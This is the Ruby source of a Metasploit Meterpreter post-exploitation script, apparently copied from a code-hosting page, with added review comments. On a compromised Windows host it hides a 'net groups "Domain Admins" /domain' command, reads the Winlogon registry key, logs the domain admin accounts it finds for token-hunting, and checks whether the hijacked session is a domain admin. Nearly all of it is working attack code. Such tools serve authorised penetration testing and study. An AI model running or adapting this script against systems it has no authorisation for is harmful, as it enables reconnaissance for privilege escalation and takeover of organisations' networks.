
domain_list_gen.rb 3.3KB

  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
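# Options and option parsing. Only "-h" is recognised; anything else falls
# through the case statement and is ignored.
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ]
)
opts.parse(args) { |opt, idx, val|
  case opt
  when "-h"
    # Help text (wording fixed: "Doamin" -> "Domain", stray period and
    # doubled "is" removed). Raising Completed ends the script without
    # touching the session.
    print_line "Meterpreter Script for extracting Domain Admin Account list for use"
    print_line "in token_hunter plugin and verifies if current account for session"
    print_line "is a member of such group."
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
}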
  22. def unsupported
  23. print_error("This version of Meterpreter is not supported with this Script!")
  24. raise Rex::Script::Completed
  25. end
#-------------------------------------------------------------------------------
# General variables used by the rest of the script
@client = client
host = @client.sys.config.sysinfo['Computer']
# getuid returns "DOMAIN\user"; the scan keeps only the part after the last
# backslash, as an array of capture arrays (e.g. [["bob"]]) that the
# membership test below flattens with join. The domain part is discarded.
current_user = @client.sys.config.getuid.scan(/\S*\\(.*)/)
users = ""   # raw stdout of the `net group` command, appended to chunk by chunk
list  = []   # lower-cased member names, used for the membership test
  33. def reg_getvaldata(key,valname)
  34. value = nil
  35. begin
  36. root_key, base_key = @client.sys.registry.splitkey(key)
  37. open_key = @client.sys.registry.open_key(root_key, base_key, KEY_READ)
  38. v = open_key.query_value(valname)
  39. value = v.data
  40. open_key.close
  41. end
  42. return value
  43. end
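# The registry and `net` calls need a Windows Meterpreter, so bail out before
# touching them. (The original ran the registry read first and only then
# checked the platform, so a non-Windows session died with a traceback.)
unsupported if client.platform != 'windows'
# DefaultDomainName is the domain of the last interactive logon on this host;
# it is not necessarily the domain of the current session's token. It is only
# used to label the accounts in the output, so a miss is reported, not fatal.
# reg_getvaldata may return nil on failure; normalise to "" so the check and
# the later "#{domain}\\user" interpolation behave the same way.
domain = reg_getvaldata("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName") || ""
if domain.empty?
  print_error("domain not found")
end
# Timestamp suffix for the local log file. The hour was missing from the
# original format ("%Y%m%d.%M%S"), so two runs in the same minute of different
# hours were appended to the same file.
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%H%M%S")
# Local directory for the logs
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'domain_admins')
::FileUtils.mkdir_p(logs)
# `host` is reported by the compromised machine and is therefore untrusted
# input to a local path; clean_path is relied on to sanitise it so the log
# cannot land outside the logs directory. NOTE(review): verify clean_path
# covers the characters you care about before trusting this in other contexts.
dest = Rex::FileUtils.clean_path(logs + "/" + host + filenameinfo + ".txt")
print_status("found users will be saved to #{dest}")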
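################## MAIN ##################
# Run `net group` on the target and capture its output. Both the group name
# and the "System error" marker are the English strings; on a localised
# Windows the group is named differently and this enumeration will find
# nothing, and a localised error message will not be recognised.
cmd = 'net groups "Domain Admins" /domain'
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
begin
  # channel.read returns nil at EOF; an empty chunk is also treated as the end.
  while (d = r.channel.read)
    users << d
    if d =~ /System error/
      print_error("Could not enumerate Domain Admins!")
      raise Rex::Script::Completed
    end
    break if d == ""
  end
ensure
  # Release the channel and the process handle on the target even when we
  # bail out with Completed above; the original never closed either. A
  # failure here is reported but must not mask the reason we are leaving.
  begin
    r.channel.close
    r.close
  rescue => e
    print_error("Could not release process handle: #{e.message}")
  end
end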
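# Split the output into lines. The "\r" of each "\r\n" stays on the line; the
# whitespace split below removes it.
out_lines = users.split("\n")
# Select only the rows holding member names. This assumes the layout of
# `net group`'s output as seen by the original author: up to six header lines
# before the separator row of dashes, and two trailing lines after the last
# member row. `slice` returns nil when fewer than eight lines came back
# (truncated or unexpected output), which used to crash `domadmins.each`;
# treat that as "no members found" instead.
a_size = out_lines.length - 8
domadmins = out_lines.slice(6, a_size) || []
# Pull the usernames out of those rows: `net group` prints several per line
# separated by whitespace, and the separator row is all dashes.
domainadmin_user_list = []
domadmins.each do |row|
  row.split(" ").each do |field|
    name = field.strip
    domainadmin_user_list << name unless name.empty? || field =~ /----/
  end
end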
# Report every account found: print it, append it to the local log file and
# keep a lower-cased copy for the membership test that follows. `domain` is
# the registry's DefaultDomainName, so the label may not match the domain
# the group actually lives in.
print_status("Accounts Found:")
domainadmin_user_list.each do |account|
  qualified = "#{domain}\\#{account}"
  print_status("\t#{qualified}")
  file_local_write(dest, qualified)
  list << account.downcase
end
  89. if list.index(current_user.join.chomp.downcase)
  90. print_status("Current sessions running as #{domain}\\#{current_user.join.chomp} is a Domain Admin!!")
  91. else
  92. print_error("Current session running as #{domain}\\#{current_user.join.chomp} is not running as Domain Admin")
  93. end